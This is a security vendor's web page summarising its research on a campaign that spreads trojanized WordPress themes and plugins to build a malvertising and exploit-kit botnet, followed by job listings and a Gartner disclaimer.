How PHP’s Labyrinth Weaponized WordPress Themes for Profit

Prevailion Tailored Intelligence image

New findings from Prevailion’s Tailored Intelligence team indicate the rapid expansion of a series of supply chain attacks that transform installations of the popular WordPress content management system into hosts for a malicious advertising network. More than 20,000 web servers have been identified to be compromised in this campaign.

WordPress has grown to become the backbone of 60% of content management systems, comprising 34% of all websites on the internet. This widespread user base and the ease in which a website can be personalized without knowledge of coding has created a fertile ground for exploitation by threat actors that we have dubbed PHP’s Labyrinth.

As previously reported, a threat actor campaign has been vehicularizing WordPress’ customization tools by enticing victims with trojans disguised as free themes and plugins. Once these are installed, not only can threat actors compromise admin accounts, they can also prop up malavertising ads and use this vector to deliver exploit kits both would allow threat actors to compromise visitors of those websites. 

Prevailion has been working closely with a US federal law enforcement agency to provide new evidence on the threat actor behind this sophisticated botnet, along with the discovery of previously unreported malicious activities, including: 

  • 30 active malicious platforms serving  these malicious themes and plugins 
  • Newly discovered second-stage malware functions such as an anti-adblocker script and additional C2
  • Distribution of the Fallout exploit kit and malvertising adware through the Propeller Ads network (which claims to have over 100 million desktop and mobile users per day)

To learn more, read the full report on the Tailored Intelligence blog.

The Latest

Post thumbnail image

Information Technology Manager

The Information Technology Manager works to support Prevailion’s IT assets, employees and mission critical systems. In this role, you will wear many hats and work collaboratively with internal teams to deploy, manage, and maintain systems and infrastructure key to the company’s success and growth of Prevailion.

Post thumbnail image

Threat Intelligence Researcher

The Threat Intelligence Researcher works in Prevailion’s Intelligence team. In this role, you will work collaboratively with internal teams to deploy, manage, and maintain systems and infrastructure key to the Intelligence team’s success and growth and that of Prevailion.

Post thumbnail image

Senior Threat Intelligence Researcher

The Senior Threat Intelligence Researcher works in Prevailion’s Intelligence team. In this role, you will work collaboratively with internal teams to deploy, manage, and maintain systems and infrastructure key to the Intelligence team’s success and growth and that of Prevailion.

Copyright 2021 Prevailion, Inc. All rights reserved.    

Disclaimer: Gartner “Cool Vendors in Security Operations and Threat Intelligence,” Mitchell Schneider, Ruggero Contu, John Watts, Craig Lawson, October 13, 2020. GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally and is used herein with permission. All rights reserved. Gartner Disclaimer: The GARTNER COOL VENDOR badge is a trademark and service mark of Gartner, Inc. and/or its affiliates and is used herein with permission. All rights reserved. Gartner does not endorse any vendor, product or service depicted in its research publications and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s Research & Advisory organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.